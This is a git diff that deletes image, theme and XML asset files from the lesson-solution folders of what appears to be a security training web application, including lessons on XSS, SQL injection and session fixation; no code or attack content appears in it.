/dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image006.jpg b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image006.jpg deleted file mode 100644 index 4d4491eb3..000000000 Binary files a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image006.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/themedata.thmx b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/themedata.thmx deleted file mode 100644 index 55426d8ec..000000000 Binary files a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/themedata.thmx and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/Phishing_files/image001.jpg b/src/main/webapp/lesson_solutions/Phishing_files/image001.jpg deleted file mode 100644 index 967ebaa4c..000000000 Binary files a/src/main/webapp/lesson_solutions/Phishing_files/image001.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/ReflectedXSS_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/ReflectedXSS_files/colorschememapping.xml deleted file mode 100644 index b200daa38..000000000 --- a/src/main/webapp/lesson_solutions/ReflectedXSS_files/colorschememapping.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/ReflectedXSS_files/filelist.xml b/src/main/webapp/lesson_solutions/ReflectedXSS_files/filelist.xml deleted file mode 100644 index 8ebcbe37d..000000000 --- a/src/main/webapp/lesson_solutions/ReflectedXSS_files/filelist.xml +++ /dev/null @@ -1,10 +0,0 @@ - - - - - - - - - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image001.png b/src/main/webapp/lesson_solutions/ReflectedXSS_files/image001.png deleted file mode 100644 index 6ff72a45b..000000000 Binary files a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image001.png and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image003.png b/src/main/webapp/lesson_solutions/ReflectedXSS_files/image003.png deleted file mode 100644 index e44f2e566..000000000 Binary files a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image003.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image005.jpg b/src/main/webapp/lesson_solutions/ReflectedXSS_files/image005.jpg deleted file mode 100644 index 73cdb0bbf..000000000 Binary files a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image005.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image006.jpg b/src/main/webapp/lesson_solutions/ReflectedXSS_files/image006.jpg deleted file mode 100644 index fb2e1977e..000000000 Binary files a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image006.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/ReflectedXSS_files/themedata.thmx b/src/main/webapp/lesson_solutions/ReflectedXSS_files/themedata.thmx deleted file mode 100644 index 55426d8ec..000000000 Binary files a/src/main/webapp/lesson_solutions/ReflectedXSS_files/themedata.thmx and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/colorschememapping.xml deleted file mode 100644 index b200daa38..000000000 --- a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/colorschememapping.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/filelist.xml b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/filelist.xml deleted file mode 100644 index abc27092d..000000000 --- a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/filelist.xml +++ /dev/null @@ -1,12 +0,0 @@ - - - - - - - - - - - - \ No newline at end of file 
diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image001.png b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image001.png deleted file mode 100644 index eb4392c2d..000000000 Binary files a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image001.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image002.jpg b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image002.jpg deleted file mode 100644 index 6301ccbb1..000000000 Binary files a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image002.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image003.png b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image003.png deleted file mode 100644 index b6bf2f272..000000000 Binary files a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image003.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image004.jpg b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image004.jpg deleted file mode 100644 index d94ac96c1..000000000 Binary files a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image004.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image005.png b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image005.png deleted file mode 100644 index 4a274e847..000000000 Binary files a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image005.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image006.jpg b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image006.jpg deleted file mode 100644 index b93cbad84..000000000 Binary files a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image006.jpg and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/themedata.thmx b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/themedata.thmx deleted file mode 100644 index 55426d8ec..000000000 Binary files a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/themedata.thmx and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage1.png b/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage1.png deleted file mode 100644 index feb782736..000000000 Binary files a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage1.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage2.png b/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage2.png deleted file mode 100644 index 002ceece2..000000000 Binary files a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage2.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage3.png b/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage3.png deleted file mode 100644 index d7c056258..000000000 Binary files a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage3.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage4_1.png b/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage4_1.png deleted file mode 100644 index a905298d0..000000000 Binary files a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage4_1.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage4_2.png b/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage4_2.png deleted file mode 100644 index c0579ce8f..000000000 Binary files a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage4_2.png and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_success.png b/src/main/webapp/lesson_solutions/SessionFixation_files/sf_success.png deleted file mode 100644 index a3edf2e13..000000000 Binary files a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_success.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/SilentTransactions_files/colorschememapping.xml deleted file mode 100644 index b200daa38..000000000 --- a/src/main/webapp/lesson_solutions/SilentTransactions_files/colorschememapping.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/filelist.xml b/src/main/webapp/lesson_solutions/SilentTransactions_files/filelist.xml deleted file mode 100644 index dbcf5ad0e..000000000 --- a/src/main/webapp/lesson_solutions/SilentTransactions_files/filelist.xml +++ /dev/null @@ -1,14 +0,0 @@ - - - - - - - - - - - - - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image001.png b/src/main/webapp/lesson_solutions/SilentTransactions_files/image001.png deleted file mode 100644 index 61f7e63a1..000000000 Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image001.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image003.png b/src/main/webapp/lesson_solutions/SilentTransactions_files/image003.png deleted file mode 100644 index faf59c077..000000000 Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image003.png and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image005.png b/src/main/webapp/lesson_solutions/SilentTransactions_files/image005.png deleted file mode 100644 index 4f4f0608a..000000000 Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image005.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image007.png b/src/main/webapp/lesson_solutions/SilentTransactions_files/image007.png deleted file mode 100644 index 04494b197..000000000 Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image007.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image009.jpg b/src/main/webapp/lesson_solutions/SilentTransactions_files/image009.jpg deleted file mode 100644 index b2529e37c..000000000 Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image009.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image010.jpg b/src/main/webapp/lesson_solutions/SilentTransactions_files/image010.jpg deleted file mode 100644 index da2d8692a..000000000 Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image010.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image011.jpg b/src/main/webapp/lesson_solutions/SilentTransactions_files/image011.jpg deleted file mode 100644 index efdefff06..000000000 Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image011.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image012.jpg b/src/main/webapp/lesson_solutions/SilentTransactions_files/image012.jpg deleted file mode 100644 index 8375ab7cd..000000000 Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/image012.jpg and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/themedata.thmx b/src/main/webapp/lesson_solutions/SilentTransactions_files/themedata.thmx deleted file mode 100644 index 55426d8ec..000000000 Binary files a/src/main/webapp/lesson_solutions/SilentTransactions_files/themedata.thmx and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/SoapRequest_files/colorschememapping.xml deleted file mode 100644 index b200daa38..000000000 --- a/src/main/webapp/lesson_solutions/SoapRequest_files/colorschememapping.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/filelist.xml b/src/main/webapp/lesson_solutions/SoapRequest_files/filelist.xml deleted file mode 100644 index 2c3012bc9..000000000 --- a/src/main/webapp/lesson_solutions/SoapRequest_files/filelist.xml +++ /dev/null @@ -1,16 +0,0 @@ - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image001.png b/src/main/webapp/lesson_solutions/SoapRequest_files/image001.png deleted file mode 100644 index baa4ba50f..000000000 Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image001.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image002.jpg b/src/main/webapp/lesson_solutions/SoapRequest_files/image002.jpg deleted file mode 100644 index f9ab80c9b..000000000 Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image002.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image003.png b/src/main/webapp/lesson_solutions/SoapRequest_files/image003.png deleted file mode 100644 index ab5ed9af8..000000000 Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image003.png and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image004.jpg b/src/main/webapp/lesson_solutions/SoapRequest_files/image004.jpg deleted file mode 100644 index c12c37f71..000000000 Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image004.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image005.png b/src/main/webapp/lesson_solutions/SoapRequest_files/image005.png deleted file mode 100644 index f46b3b8f7..000000000 Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image005.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image006.jpg b/src/main/webapp/lesson_solutions/SoapRequest_files/image006.jpg deleted file mode 100644 index d7c4069ba..000000000 Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image006.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image007.png b/src/main/webapp/lesson_solutions/SoapRequest_files/image007.png deleted file mode 100644 index a841fc1d5..000000000 Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image007.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image008.jpg b/src/main/webapp/lesson_solutions/SoapRequest_files/image008.jpg deleted file mode 100644 index 2d4b523a5..000000000 Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image008.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image009.png b/src/main/webapp/lesson_solutions/SoapRequest_files/image009.png deleted file mode 100644 index 2b7656cc1..000000000 Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image009.png and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image010.jpg b/src/main/webapp/lesson_solutions/SoapRequest_files/image010.jpg deleted file mode 100644 index 910fb47dc..000000000 Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image010.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/image011.jpg b/src/main/webapp/lesson_solutions/SoapRequest_files/image011.jpg deleted file mode 100644 index fc258a811..000000000 Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/image011.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SoapRequest_files/themedata.thmx b/src/main/webapp/lesson_solutions/SoapRequest_files/themedata.thmx deleted file mode 100644 index 55426d8ec..000000000 Binary files a/src/main/webapp/lesson_solutions/SoapRequest_files/themedata.thmx and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SqlAddData_files/image001.jpg b/src/main/webapp/lesson_solutions/SqlAddData_files/image001.jpg deleted file mode 100644 index 025d0c4c0..000000000 Binary files a/src/main/webapp/lesson_solutions/SqlAddData_files/image001.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SqlModifyData_files/image001.jpg b/src/main/webapp/lesson_solutions/SqlModifyData_files/image001.jpg deleted file mode 100644 index 0b5b82073..000000000 Binary files a/src/main/webapp/lesson_solutions/SqlModifyData_files/image001.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/colorschememapping.xml deleted file mode 100644 index b200daa38..000000000 --- a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/colorschememapping.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file 
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/filelist.xml deleted file mode 100644 index ce53b8ce8..000000000 --- a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/filelist.xml +++ /dev/null @@ -1,12 +0,0 @@ - - - - - - - - - - - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image001.png b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image001.png deleted file mode 100644 index 4876d330e..000000000 Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image001.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image002.jpg b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image002.jpg deleted file mode 100644 index 11fa10d47..000000000 Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image002.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image003.png b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image003.png deleted file mode 100644 index 272aa8b2b..000000000 Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image003.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image004.jpg b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image004.jpg deleted file mode 100644 index 38109d42f..000000000 Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image004.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image005.png b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image005.png deleted file mode 100644 index f2868eb02..000000000 Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image005.png and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image006.jpg b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image006.jpg deleted file mode 100644 index eb31b8e72..000000000 Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/image006.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection.png b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection.png deleted file mode 100644 index bbafec0a6..000000000 Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection_solved.png b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection_solved.png deleted file mode 100644 index 54ef52882..000000000 Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/numericinjection_solved.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/SqlNumericInjection_files/themedata.thmx deleted file mode 100644 index 55426d8ec..000000000 Binary files a/src/main/webapp/lesson_solutions/SqlNumericInjection_files/themedata.thmx and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/SqlStringInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/SqlStringInjection_files/colorschememapping.xml deleted file mode 100644 index b200daa38..000000000 --- a/src/main/webapp/lesson_solutions/SqlStringInjection_files/colorschememapping.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file 
diff --git a/src/main/webapp/lesson_solutions/SqlStringInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/SqlStringInjection_files/themedata.thmx deleted file mode 100644 index 55426d8ec..000000000 Binary files a/src/main/webapp/lesson_solutions/SqlStringInjection_files/themedata.thmx and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/StoredXSS_files/colorschememapping.xml deleted file mode 100644 index b200daa38..000000000 --- a/src/main/webapp/lesson_solutions/StoredXSS_files/colorschememapping.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/filelist.xml b/src/main/webapp/lesson_solutions/StoredXSS_files/filelist.xml deleted file mode 100644 index a3cfc699b..000000000 --- a/src/main/webapp/lesson_solutions/StoredXSS_files/filelist.xml +++ /dev/null @@ -1,12 +0,0 @@ - - - - - - - - - - - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/image001.png b/src/main/webapp/lesson_solutions/StoredXSS_files/image001.png deleted file mode 100644 index 1ad882b5f..000000000 Binary files a/src/main/webapp/lesson_solutions/StoredXSS_files/image001.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/image003.png b/src/main/webapp/lesson_solutions/StoredXSS_files/image003.png deleted file mode 100644 index d44ec5c39..000000000 Binary files a/src/main/webapp/lesson_solutions/StoredXSS_files/image003.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/image005.png b/src/main/webapp/lesson_solutions/StoredXSS_files/image005.png deleted file mode 100644 index 5a5d10342..000000000 Binary files a/src/main/webapp/lesson_solutions/StoredXSS_files/image005.png and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/image007.jpg b/src/main/webapp/lesson_solutions/StoredXSS_files/image007.jpg deleted file mode 100644 index ca84b8469..000000000 Binary files a/src/main/webapp/lesson_solutions/StoredXSS_files/image007.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/image008.jpg b/src/main/webapp/lesson_solutions/StoredXSS_files/image008.jpg deleted file mode 100644 index 8ece60e0a..000000000 Binary files a/src/main/webapp/lesson_solutions/StoredXSS_files/image008.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/image009.jpg b/src/main/webapp/lesson_solutions/StoredXSS_files/image009.jpg deleted file mode 100644 index c0313ee42..000000000 Binary files a/src/main/webapp/lesson_solutions/StoredXSS_files/image009.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/StoredXSS_files/themedata.thmx b/src/main/webapp/lesson_solutions/StoredXSS_files/themedata.thmx deleted file mode 100644 index 55426d8ec..000000000 Binary files a/src/main/webapp/lesson_solutions/StoredXSS_files/themedata.thmx and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/colorschememapping.xml deleted file mode 100644 index b200daa38..000000000 --- a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/colorschememapping.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/filelist.xml b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/filelist.xml deleted file mode 100644 index 010502f71..000000000 --- a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/filelist.xml +++ /dev/null @@ -1,12 +0,0 @@ - - - - - - - - - - - - \ No newline at end of file 
diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image001.png b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image001.png deleted file mode 100644 index 398af0841..000000000 Binary files a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image001.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image002.jpg b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image002.jpg deleted file mode 100644 index 52526d118..000000000 Binary files a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image002.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image003.png b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image003.png deleted file mode 100644 index d22701fe3..000000000 Binary files a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image003.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image004.jpg b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image004.jpg deleted file mode 100644 index 4b222b8f0..000000000 Binary files a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image004.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image007.png b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image007.png deleted file mode 100644 index 8c9ea75b7..000000000 Binary files a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image007.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image009.jpg b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image009.jpg deleted file mode 100644 index 6a1c67f50..000000000 Binary files a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/image009.jpg and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/themedata.thmx b/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/themedata.thmx deleted file mode 100644 index 55426d8ec..000000000 Binary files a/src/main/webapp/lesson_solutions/ThreadSafetyProblem_files/themedata.thmx and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/TraceXSS_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/TraceXSS_files/colorschememapping.xml deleted file mode 100644 index b200daa38..000000000 --- a/src/main/webapp/lesson_solutions/TraceXSS_files/colorschememapping.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/TraceXSS_files/filelist.xml b/src/main/webapp/lesson_solutions/TraceXSS_files/filelist.xml deleted file mode 100644 index 90de9a7db..000000000 --- a/src/main/webapp/lesson_solutions/TraceXSS_files/filelist.xml +++ /dev/null @@ -1,8 +0,0 @@ - - - - - - - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/TraceXSS_files/image001.png b/src/main/webapp/lesson_solutions/TraceXSS_files/image001.png deleted file mode 100644 index 1a73bd667..000000000 Binary files a/src/main/webapp/lesson_solutions/TraceXSS_files/image001.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/TraceXSS_files/image002.jpg b/src/main/webapp/lesson_solutions/TraceXSS_files/image002.jpg deleted file mode 100644 index fd3b3d48e..000000000 Binary files a/src/main/webapp/lesson_solutions/TraceXSS_files/image002.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/TraceXSS_files/themedata.thmx b/src/main/webapp/lesson_solutions/TraceXSS_files/themedata.thmx deleted file mode 100644 index 55426d8ec..000000000 Binary files a/src/main/webapp/lesson_solutions/TraceXSS_files/themedata.thmx and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/UncheckedEmail_files/colorschememapping.xml deleted file mode 100644 index b200daa38..000000000 --- a/src/main/webapp/lesson_solutions/UncheckedEmail_files/colorschememapping.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/filelist.xml b/src/main/webapp/lesson_solutions/UncheckedEmail_files/filelist.xml deleted file mode 100644 index 679895ff7..000000000 --- a/src/main/webapp/lesson_solutions/UncheckedEmail_files/filelist.xml +++ /dev/null @@ -1,14 +0,0 @@ - - - - - - - - - - - - - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image001.png b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image001.png deleted file mode 100644 index 4c5655e62..000000000 Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image001.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image002.jpg b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image002.jpg deleted file mode 100644 index 62a30cf94..000000000 Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image002.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image003.png b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image003.png deleted file mode 100644 index 8fd3ad15c..000000000 Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image003.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image004.jpg b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image004.jpg deleted file mode 100644 index 2a5943d8f..000000000 Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image004.jpg and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image005.png b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image005.png deleted file mode 100644 index 861f3dc14..000000000 Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image005.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image006.jpg b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image006.jpg deleted file mode 100644 index fae87c128..000000000 Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image006.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image007.png b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image007.png deleted file mode 100644 index 46049533d..000000000 Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image007.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image008.jpg b/src/main/webapp/lesson_solutions/UncheckedEmail_files/image008.jpg deleted file mode 100644 index fe5aa8442..000000000 Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/image008.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/UncheckedEmail_files/themedata.thmx b/src/main/webapp/lesson_solutions/UncheckedEmail_files/themedata.thmx deleted file mode 100644 index 55426d8ec..000000000 Binary files a/src/main/webapp/lesson_solutions/UncheckedEmail_files/themedata.thmx and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/WSDLScanning_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/WSDLScanning_files/colorschememapping.xml deleted file mode 100644 index b200daa38..000000000 --- a/src/main/webapp/lesson_solutions/WSDLScanning_files/colorschememapping.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file 
